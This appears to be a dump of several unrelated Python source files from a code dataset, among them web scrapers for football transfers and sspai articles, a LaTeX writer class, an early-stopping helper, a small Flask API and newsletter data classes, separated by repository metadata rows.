                clubs_left_nationalities = []
                clubs_left_leagues = []
                # Column 4, second row: optional flag image and league link of
                # the selling club; absent values become empty strings.
                for club_left in soup.select("table.items > tbody > tr > td:nth-of-type(4) > table > tr:nth-of-type(2)"):
                    club_left_nationality = club_left.select("td > img")
                    if club_left_nationality:
                        clubs_left_nationalities.append(club_left_nationality[0].get("title"))
                    else:
                        clubs_left_nationalities.append("")
                    club_left_league = club_left.select("td > a")
                    if club_left_league:
                        clubs_left_leagues.append(club_left_league[0].text)
                    else:
                        clubs_left_leagues.append("")
                clubs_joined = soup.select("table.items > tbody > tr > td:nth-of-type(5) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
                clubs_joined_nationalities = []
                clubs_joined_leagues = []
                # Same extraction for the buying club (column 5).
                for club_joined in soup.select("table.items > tbody > tr > td:nth-of-type(5) > table > tr:nth-of-type(2)"):
                    club_joined_nationality = club_joined.select("td > img")
                    if club_joined_nationality:
                        clubs_joined_nationalities.append(club_joined_nationality[0].get("title"))
                    else:
                        clubs_joined_nationalities.append("")
                    club_joined_league = club_joined.select("td > a")
                    if club_joined_league:
                        clubs_joined_leagues.append(club_joined_league[0].text)
                    else:
                        clubs_joined_leagues.append("")
                transfer_dates = soup.select("table.items > tbody > tr > td:nth-of-type(6)")
                market_values_at_time = soup.select("table.items > tbody > tr > td:nth-of-type(7)")
                transfer_fees = soup.select("table.items > tbody > tr > td:nth-of-type(8)")
                # Merge this page's parallel column lists into the overall
                # accumulators, row by row.
                for i in range(len(players_names)):
                    players_names_list.append(players_names[i].text)
                    players_positions_list.append(players_positions[i].text)
                    players_ages_list.append(players_ages[i].text)
                    players_first_nationalities_list.append(players_first_nationalities[i])
                    players_second_nationalities_list.append(players_second_nationalities[i])
                    clubs_left_list.append(clubs_left[i].text)
                    clubs_left_nationalities_list.append(clubs_left_nationalities[i])
                    clubs_left_leagues_list.append(clubs_left_leagues[i])
                    clubs_joined_list.append(clubs_joined[i].text)
                    clubs_joined_nationalities_list.append(clubs_joined_nationalities[i])
                    clubs_joined_leagues_list.append(clubs_joined_leagues[i])
                    transfer_dates_list.append(transfer_dates[i].text)
                    market_values_at_time_list.append(market_values_at_time[i].text)
                    transfer_fees_list.append(transfer_fees[i].text)
                # Fetch the next page, or stop after the last one.
                page_number = page_number + 1
                if page_number <= number_of_pages:
                    url = f"https://www.transfermarkt.com.br/transfers/neuestetransfers/statistik/plus/plus/1/galerie/0/wettbewerb_id/alle/land_id/{land_id}/minMarktwert/0/maxMarktwert/500.000.000/yt0/Mostrar/page/{page_number}"
                    page_tree = requests.get(url, headers=self.headers)
                    soup = BeautifulSoup(page_tree.content, 'html.parser')
                else:
                    has_more_pages = False
            df = pd.DataFrame({
                "player_name":players_names_list,
                "player_position":players_positions_list,
                "player_age":players_ages_list,
                "player_first_nationality":players_first_nationalities_list,
                "player_second_nationality":players_second_nationalities_list,
                "club_left":clubs_left_list,
                "club_left_nationality":clubs_left_nationalities_list,
                "club_left_league":clubs_left_leagues_list,
                "club_joined":clubs_joined_list,
                "club_joined_nationality":clubs_joined_nationalities_list,
                "club_joined_league":clubs_joined_leagues_list,
                "transfer_date":transfer_dates_list,
                "market_value_at_time":market_values_at_time_list,
                "transfer_fee":transfer_fees_list
            })
            file_name_prefix = "latest_transfers_" + clubs_from_country + "_"
            self.write_to_CSV(df, file_name_prefix)
        else:
            logging.info(f"{clubs_from_country} had no transfers.")
    def scrape_transfers(self):
        """Scrape the first page of the 2020-season top-transfers listing
        (all countries) and write it to a dated ``transfers_*.csv``.

        Unlike scrape_latest_transfers, this method does not paginate.
        """
        url = "https://www.transfermarkt.com.br/transfers/saisontransfers/statistik/top/plus/1/galerie/0?saison_id=2020&transferfenster=alle&land_id=&ausrichtung=&spielerposition_id=&altersklasse=&leihe="
        pageTree = requests.get(url, headers=self.headers)
        soup = BeautifulSoup(pageTree.content, 'html.parser')
        players_names = soup.select("table.items > tbody> tr > td:nth-of-type(2) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
        players_positions = soup.select("table.items > tbody > tr > td:nth-of-type(2) > table > tr:nth-of-type(2) > td")
        players_ages = soup.select("table.items > tbody > tr > td:nth-of-type(3)")
        market_values_at_time = soup.select("table.items > tbody > tr > td:nth-of-type(4)")
        players_first_nationalities = []
        players_second_nationalities = []
        # Column 5: one or two flags per player; missing second nationality
        # becomes an empty string so the columns stay aligned.
        for player_nationality in soup.select("table.items > tbody > tr > td:nth-of-type(5)"):
            player_first_nationality = player_nationality.select("td > img:nth-of-type(1)")
            player_second_nationality = player_nationality.select("td > img:nth-of-type(2)")
            players_first_nationalities.append(player_first_nationality[0].get("title"))
            if player_second_nationality:
                players_second_nationalities.append(player_second_nationality[0].get("title"))
            else:
                players_second_nationalities.append("")
        clubs_left = soup.select("table.items > tbody > tr > td:nth-of-type(6) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
        clubs_left_nationalities = soup.select("table.items > tbody > tr > td:nth-of-type(6) > table > tr:nth-of-type(2) > td > img")
        clubs_left_leagues = soup.select("table.items > tbody > tr > td:nth-of-type(6) > table > tr:nth-of-type(2) > td > a")
        clubs_joined = soup.select("table.items > tbody > tr > td:nth-of-type(7) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
        clubs_joined_nationalities = soup.select("table.items > tbody > tr > td:nth-of-type(7) > table > tr:nth-of-type(2) > td > img")
        clubs_joined_leagues = soup.select("table.items > tbody > tr > td:nth-of-type(7) > table > tr:nth-of-type(2) > td > a")
        fees = soup.select("table.items > tbody > tr > td:nth-of-type(8)")
        players_names_list = []
        players_positions_list = []
        players_ages_list = []
        market_values_at_time_list = []
        seasons_list = []
        players_first_nationalities_list = []
        players_second_nationalities_list = []
        clubs_left_list = []
        clubs_left_nationalities_list = []
        clubs_left_leagues_list = []
        clubs_joined_list = []
        clubs_joined_nationalities_list = []
        clubs_joined_leagues_list = []
        transfers_fees_list = []
        # Flatten the selected tags into plain-text column lists, one entry
        # per table row; the season is a constant for this listing.
        for i in range(len(players_names)):
            players_names_list.append(players_names[i].text)
            players_positions_list.append(players_positions[i].text)
            players_ages_list.append(players_ages[i].text)
            market_values_at_time_list.append(market_values_at_time[i].text)
            seasons_list.append("20/21")
            players_first_nationalities_list.append(players_first_nationalities[i])
            players_second_nationalities_list.append(players_second_nationalities[i])
            clubs_left_list.append(clubs_left[i].text)
            clubs_left_nationalities_list.append(clubs_left_nationalities[i].get("title"))
            clubs_left_leagues_list.append(clubs_left_leagues[i].text)
            clubs_joined_list.append(clubs_joined[i].text)
            clubs_joined_nationalities_list.append(clubs_joined_nationalities[i].get("title"))
            clubs_joined_leagues_list.append(clubs_joined_leagues[i].text)
            transfers_fees_list.append(fees[i].text)
        df = pd.DataFrame({
            "player_name":players_names_list,
            "player_position":players_positions_list,
            "player_age":players_ages_list,
            "market_value_at_time":market_values_at_time_list,
            "season":seasons_list,
            "player_first_nationality":players_first_nationalities_list,
            "player_second_nationality":players_second_nationalities_list,
            "club_left":clubs_left_list,
            "club_left_nationality":clubs_left_nationalities_list,
            "club_left_league":clubs_left_leagues_list,
            "club_joined":clubs_joined_list,
            "club_joined_nationality":clubs_joined_nationalities_list,
            "club_joined_league":clubs_joined_leagues_list,
            "transfer_fee":transfers_fees_list
        })
        file_name_prefix = "transfers_"
        self.write_to_CSV(df, file_name_prefix)
    def write_to_CSV(self, df, file_name_prefix):
        """Write *df* to ``<local_data_path>/<prefix><YYYY_MM_DD>.csv``,
        creating the staging directory if needed."""
        output_dir = Path(self.local_data_path)
        output_dir.mkdir(parents=True, exist_ok=True)
        #file_name = self.s3_file_name_prefix + datetime.now().strftime("%Y_%m_%d_%H_%M_%S") + ".csv"
        file_name = file_name_prefix + datetime.now().strftime("%Y_%m_%d") + ".csv"
        file_path = self.local_data_path + file_name
        df.to_csv(file_path, index = False, quoting=csv.QUOTE_NONNUMERIC)
    def load_CSV_on_S3(self):
        """Upload every staged CSV in local_data_path to the configured
        bucket/folder, replacing any object with the same key."""
        file_path_pattern = self.local_data_path + "*.csv"
        for f in glob.glob(file_path_pattern):
            key = self.s3_bucket_folder + f.split('/')[-1]
            self.s3.load_file(filename=f, bucket_name=self.s3_bucket_name, replace=True, key=key)
    def delete_local_CSV(self, filepath='./dags/data/*.csv'):
        """Delete all staged CSV files.

        NOTE(review): the *filepath* parameter is unused — the glob pattern is
        rebuilt from self.local_data_path; kept for interface compatibility.
        """
        file_path_pattern = self.local_data_path + "*.csv"
        files = glob.glob(file_path_pattern)
        for f in files:
            os.remove(f)
"leopanatta@gmail.com"
] | leopanatta@gmail.com |
d3ee2879bf5bdc43bc294030aaa16552cfce248e | d71fcc639bcf9d80233d0a58b351f94d81d37bc6 | /sspai.py | 075ac160d4c6aa5b475e1747c09911be9240d191 | [] | no_license | awesome-archive/sspai | 8ff20894c09ec327e6d96cea8ffc254baa7b0922 | 0f3533707fc9351cd55541da49610d7bddd75e15 | refs/heads/master | 2021-12-24T03:39:18.460968 | 2017-12-05T14:53:09 | 2017-12-05T14:53:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,400 | py | import time
import json
import os
import requests
from pymongo import MongoClient
# Paginated API for the "recommended to home" article feed; {offset} advances in steps of 10.
base_url = 'https://sspai.com/api/v1/articles?offset={offset}&limit=10&type=recommend_to_home&sort=recommend_to_home_at&include_total=false'
# Apparently out-of-range offset (9980) used by test() to observe the empty-page response.
false_url = 'https://sspai.com/api/v1/articles?offset=9980&limit=10&type=recommend_to_home&sort=recommend_to_home_at&include_total=false'
def get_html(url):
    """GET *url* with fixed client headers and return the response body as text."""
    request_headers = {
        'Content-Type': 'application/json; charset=utf-8',
        'User-Agent': 'Paw/3.1.5 (Macintosh; OS X/10.12.6) GCDHTTPRequest',
    }
    response = requests.get(url, headers=request_headers)
    return response.text
def parse_article_json(json_data, db):
    """
    Parse one page of the article-list JSON and store new entries in *db*.

    Each entry keeps only the article URL and title; entries already present
    in the database (matched by URL) are skipped.
    """
    result = json.loads(json_data)
    # Guard: a payload without a 'list' field would otherwise make the
    # for-loop iterate over None and crash.
    for i in result.get('list') or []:
        article_info = {
            'article_url': 'https://sspai.com/post/{id}'.format(id=i.get('id')),
            'article_title': i.get('title'),
        }
        if not isDataExist(article_info, db):
            print('保存新数据')
            saveData(article_info, db)
        else:
            print('数据已存在')
def initSQL():
    """
    Connect to the local MongoDB server and return the sspai database handle.
    """
    return MongoClient('localhost', 27017).sspai
def saveData(data, db):
    """
    Insert *data* into the ARTICLE_LIST collection of *db*.
    """
    # NOTE(review): Collection.insert() is deprecated in pymongo 3 and removed
    # in pymongo 4; insert_one() is the modern replacement — confirm the
    # pinned pymongo version before changing.
    db.ARTICLE_LIST.insert(data)
def isDataExist(data, db):
    """
    Return the number of ARTICLE_LIST documents whose article_url matches
    *data* (callers use the count as a truthy "already stored" flag).
    """
    # NOTE(review): Cursor.count() is deprecated since pymongo 3.7 and removed
    # in pymongo 4; count_documents() on the collection is the replacement —
    # confirm the pinned pymongo version before changing.
    return db.ARTICLE_LIST.find({'article_url': data.get('article_url')}).count()
def deleteData(data, db):
    """
    Delete *data* (matched by its article_url) from the ARTICLE_LIST collection.
    """
    if isDataExist(data, db):
        # Bug fix: the original called db.remove(...) on the Database object;
        # the query must run against the ARTICLE_LIST collection, matching
        # saveData/isDataExist.
        db.ARTICLE_LIST.remove({'article_url': data.get('article_url')})
def generateMarkdown(db):
    """
    Read every stored article from *db* and append one Markdown checklist
    line per article to sspai_info.md.
    """
    # Bug fix: the original ignored the passed-in db, silently opened a second
    # MongoClient, and shadowed the parameter; use the given handle instead.
    collection = db.ARTICLE_LIST
    # Open the output file once rather than re-opening it for every row.
    with open('sspai_info.md', mode='a', encoding='utf-8') as fw:
        for article_info in collection.find():
            fw.write('* [ ] [{Title}]({Link}):{Tags}'.format(Title=article_info.get(
                'article_title'), Link=article_info.get('article_url'), Tags='None') + os.linesep)
def get_time(timestamp):
    """
    Convert a Unix timestamp into a local-time string, e.g. "2016-05-05 20:28:54".
    """
    return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(timestamp))
def get_all_article(db):
    """
    Crawl the recommendation feed page by page, storing every article in *db*,
    until a page whose body is effectively empty (<= 11 chars) is reached.
    """
    page_index = 0
    keep_going = True
    while keep_going:
        payload = get_html(base_url.format(offset=10 * page_index))
        if len(payload) > 11:
            print('爬取第{}页'.format(page_index + 1))
            parse_article_json(payload, db)
            page_index += 1
        else:
            print('错误页面:', page_index)
            keep_going = False
def main():
    """Entry point: open the database connection and crawl every feed page."""
    get_all_article(initSQL())
def test():
    """Debug helper: print the response size for the known out-of-range page."""
    print(len(get_html(false_url)))
if __name__ == '__main__':
    # Swap in test() here for a quick connectivity check instead of a full crawl.
    main()
| [
"yan199219dang@gmail.com"
] | yan199219dang@gmail.com |
ba0bfd1f20f77d0b6b66bea68f6e18d7e70c9071 | a84f271df045516f516a1da4acc76eb9d61825b4 | /survey/exporter/tex/latex_file.py | a7ddc714199da7e2514d71d47e13fd207491c898 | [
"MIT"
] | permissive | TheWITProject/MentorApp | a28263791c78d3d5b680bf5b514d4b685442113c | 2f08b87a7cde6d180e16d6f37d0b8019b8361638 | refs/heads/master | 2022-11-23T22:44:29.237363 | 2020-05-24T16:25:27 | 2020-05-24T16:25:27 | 237,828,254 | 0 | 0 | MIT | 2022-11-22T05:54:06 | 2020-02-02T19:59:07 | Python | UTF-8 | Python | false | false | 2,071 | py | # -*- coding: utf-8 -*-
import logging
from builtins import open
from datetime import datetime
LOGGER = logging.getLogger(__name__)
class LatexFile:
    """ Permit to handle the content of a LatexFile.

    Accumulates a document class/option, header, intro, footer, date and body
    text, and can render (``document``) or persist (``save``) the assembled
    .tex source.
    """
    def __init__(self, document_class, document_option=None, header=None, intro=None, footer=None, date=None, **kwargs):
        # NOTE(review): extra **kwargs are accepted but silently ignored.
        LOGGER.debug(
            "Creating a document skeleton with document_class=%s, document_option=%s", document_class, document_option
        )
        self.document_class = document_class
        # Body text; callers append to this before rendering `document`.
        self.text = ""
        self.document_option = self.set_value(document_option)
        self._header = self.set_value(header)
        self.intro = self.set_value(intro)
        self._footer = self.set_value(footer)
        if date is None:
            # Default to today's date, e.g. "January 01, 2021".
            date = datetime.now().strftime("%B %d, %Y")
        self.date = date
    def set_value(self, value):
        """ Return the value we need for null text (None becomes ""). """
        if value is None:
            return ""
        return value
    @property
    def header(self):
        """ Return the header of a .tex file: \\documentclass line, \\date,
        any custom preamble, \\begin{document} and the intro text.

        :rtype: String """
        header = "\\documentclass"
        if self.document_option:
            header += "[{}]".format(self.document_option)
        header += "{%s}\n" % self.document_class
        header += "\\date{%s}\n" % self.date
        header += "%s\n" % self._header
        header += "\\begin{document}\n"
        header += "%s\n" % self.intro
        return header
    @property
    def footer(self):
        """ Return the footer of a .tex file: the custom footer (if any)
        followed by \\end{document}.

        :rtype: String """
        end = """
\\end{document}
"""
        if self._footer:
            return self._footer + end
        return end
    def save(self, path):
        """ Save the document on disk, UTF-8 encoded. """
        with open(path, "wb") as tex_file:
            tex_file.write(self.document.encode("UTF-8"))
    @property
    def document(self):
        """ Return the full text of the LatexFile (header + body + footer).

        :rtype: String"""
        return "{}{}{}".format(self.header, self.text, self.footer)
| [
"aisha.manasia@gmail.com"
] | aisha.manasia@gmail.com |
d6d3e38f6d727b711d14a8cf13a3acf935cdda72 | 18239524612cf572bfeaa3e001a3f5d1b872690c | /clients/client/python/test/test_submit_self_service_login_flow.py | b4e8c0a3a77a374f30e918234b71717beae63d3c | [
"Apache-2.0"
] | permissive | simoneromano96/sdk | 2d7af9425dabc30df830a09b26841fb2e8781bf8 | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | refs/heads/master | 2023-05-09T13:50:45.485951 | 2021-05-28T12:18:27 | 2021-05-28T12:18:27 | 371,689,133 | 0 | 0 | Apache-2.0 | 2021-05-28T12:11:41 | 2021-05-28T12:11:40 | null | UTF-8 | Python | false | false | 1,198 | py | """
Ory APIs
Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501
The version of the OpenAPI document: v0.0.1-alpha.3
Contact: support@ory.sh
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ory_client
from ory_client.model.submit_self_service_login_flow_with_password_method import SubmitSelfServiceLoginFlowWithPasswordMethod
globals()['SubmitSelfServiceLoginFlowWithPasswordMethod'] = SubmitSelfServiceLoginFlowWithPasswordMethod
from ory_client.model.submit_self_service_login_flow import SubmitSelfServiceLoginFlow
class TestSubmitSelfServiceLoginFlow(unittest.TestCase):
    """SubmitSelfServiceLoginFlow unit test stubs.

    Auto-generated by openapi-generator; setUp/tearDown are intentional
    no-op placeholders.
    """
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def testSubmitSelfServiceLoginFlow(self):
        """Test SubmitSelfServiceLoginFlow"""
        # FIXME: construct object with mandatory attributes with example values
        # model = SubmitSelfServiceLoginFlow()  # noqa: E501
        pass
if __name__ == '__main__':
    # Allow running this test module directly with the unittest runner.
    unittest.main()
| [
"3372410+aeneasr@users.noreply.github.com"
] | 3372410+aeneasr@users.noreply.github.com |
af0372a202a347f36ad234e05ae02fbd63fda42e | ed1478f6407ae7757a1f24574abedeef63e59969 | /tgs/code/util_scheduler.py | 51cb7a6b531cabac1fea9791dc64001c039abfd0 | [] | no_license | gmcgsokdeuvmt/tgs | fee49704879d658078c2c3367d55a87b02645f6d | b439de777ed109c14d2c472e31a5733a5bd108cc | refs/heads/master | 2020-03-31T19:33:15.799620 | 2018-10-16T02:02:22 | 2018-10-16T02:02:22 | 152,502,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | from torch.optim.lr_scheduler import *
class EarlyStopping():
    """
    Early-stopping helper: signal when training should terminate because the
    monitored loss has stopped improving.
    """
    def __init__(self,
                 min_delta=0,
                 patience=5):
        """
        Arguments
        ---------
        min_delta : float
            minimum decrease in the monitored loss to qualify as an
            improvement; should be non-negative.
        patience : integer
            number of non-improving steps to tolerate before signalling a
            stop; the counter restarts after every improvement.
        """
        self.min_delta = min_delta
        self.patience = patience
        self.wait = 0
        self.best_loss = 1e15
        self.stopped_epoch = 0

    def step(self, loss):
        """Record one epoch's loss; return True when training should stop."""
        if loss is None:
            return False
        if (loss - self.best_loss) < -self.min_delta:
            # Improvement: remember the new best and restart the counter.
            self.best_loss = loss
            self.wait = 1
            return False
        if self.wait >= self.patience:
            # Patience exhausted without improvement.
            return True
        self.wait += 1
        return False
class CheckBestModel():
    """Track the best (largest) metric value seen so far."""

    def __init__(self):
        self.best_metric = -1e15

    def step(self, metric):
        """Return True (and record it) iff *metric* beats the best so far."""
        if metric is None:
            return False
        if metric > self.best_metric:
            self.best_metric = metric
            return True
        return False
| [
"mochimochi.morst@gmail.com"
] | mochimochi.morst@gmail.com |
7c25270962adc5f1744fd005343ac44f54a83485 | 1cb7192307a2f59ecad127a65f1c6c37a9947cb9 | /docker-compose/product/api.py | 5f66e10ac7cea9f8144f22471eca0a47ff56ac86 | [] | no_license | m2a9x45/simple-docker | cf7287d99e10831223ede39edfc90de142ea06d5 | a32334eff4094a7cd074ea44c602868a6f700a40 | refs/heads/master | 2023-05-11T06:57:11.411464 | 2020-05-16T01:29:14 | 2020-05-16T01:29:14 | 264,322,819 | 0 | 0 | null | 2023-05-01T21:40:33 | 2020-05-15T23:48:58 | PHP | UTF-8 | Python | false | false | 432 | py | from flask import Flask
from flask_restful import Resource, Api
# The Flask application and its flask-restful API wrapper.
app = Flask(__name__)
api = Api(app)
class Product(Resource):
    """REST resource that serves a static product catalogue."""

    def get(self):
        """Handle GET: return the list of available product names."""
        product_names = [
            'Ice cream',
            'Chocolate',
            'Fruit',
            'eggs',
        ]
        return {'products': product_names}
# Expose the Product resource at the root path.
api.add_resource(Product, '/')
if __name__ == '__main__':
    # Bind on all interfaces so the app is reachable from outside the container.
    app.run(host='0.0.0.0', port=80, debug=True)
"noreply@github.com"
] | m2a9x45.noreply@github.com |
class Entry:
    """
    Each section on the newsletter, such as upcoming events and milestones, can have multiple entries.
    This class represents a single entry: a title, a body, and details regarding logistics.

    Attributes:
        1. title (string) - The title of the entry.
        2. body (list of Content and Image objects) - Each element in the list is displayed on a new line.
        3. details (list of Content objects) - Each element in the list represents a new detail regarding the event.
    """

    def __init__(self, title, body, details=None):
        self.title = title
        self.body = body
        # Bug fix: a mutable default argument (details=[]) is shared across
        # every Entry constructed without explicit details; use a None
        # sentinel and allocate a fresh list per instance instead.
        self.details = [] if details is None else details
class Content:
    """
    A block of text inside an entry's body or details.

    Attributes:
        1. desc (list of Text, Link, UnorderedList, and Linebreaks objects) - Each element represents one aspect of the details/body.
    """

    def __init__(self, desc):
        self.desc = desc
class Image:
    """
    Represents an image to be displayed.

    Attributes:
        1. url (string) - The url of the image to be displayed.
        2. alt (string) - Alternative text to be displayed if the image is not rendered.
        3. is_logo (bool) - Whether or not the image is a logo (default False;
           the original docstring said "string", but the default is boolean).
    """
    def __init__(self, url, alt, is_logo=False):
        self.url = url
        self.alt = alt
        self.is_logo = is_logo
class Text:
    """
    A plain piece of text inside an entry's body.

    Attributes:
        1. text (string) - The actual text that needs to be displayed.
    """

    def __init__(self, text):
        self.text = text
class Link(Text):
    """
    A piece of entry text that is hyperlinked to a url.

    Inherits from the Text class.

    Attributes:
        1. url (string) - The url that the text is being mapped to.
    """

    def __init__(self, text, url):
        self.url = url
        super().__init__(text)
class Linebreak:
    """
    A run of blank lines placed between Text and Image objects in an entry's
    body, creating whitespace between blocks of text and images.

    Attributes:
        1. numBreaks (integer) - The number of extra lines to be added.
    """

    def __init__(self, numBreaks):
        self.numBreaks = numBreaks
class LinesList:
    """
    Represents an unordered/ordered list within the body of an entry.
    Only applicable to left-oriented entries.

    Attributes:
        1. ordered (boolean) - Whether the list is ordered (numbered) or unordered.
        2. list_lines (list of strings) - The lines of the unordered/ordered list.
    """

    def __init__(self, ordered=False, list_lines=None):
        self.ordered = ordered
        # Bug fix: a mutable default argument (list_lines=[]) would be shared
        # by every LinesList constructed without explicit lines; use a None
        # sentinel and allocate a fresh list per instance instead.
        self.list_lines = [] if list_lines is None else list_lines
"noreply@github.com"
] | TritonSE.noreply@github.com |
679b56d7e69148380eea52a77a6f54987348114c | 896ae2c9853793c9cb3b2cfd771be2927c09e2eb | /Library/evalH.py | 0e071bbf6b5653d890bb5008e64787250a03b612 | [
"MIT"
def evalH(param, kappa):
    """Return the exponential hardening modulus H = hh * kappa**mm.

    Negative kappa is clamped to a tiny positive floor (1.0e-10) so callers
    never receive a negative or undefined modulus.
    """
    if kappa < 0:
        return 1.0e-10
    return param.hh * kappa ** param.mm
| [
"noreply@github.com"
] | JustinBonus.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.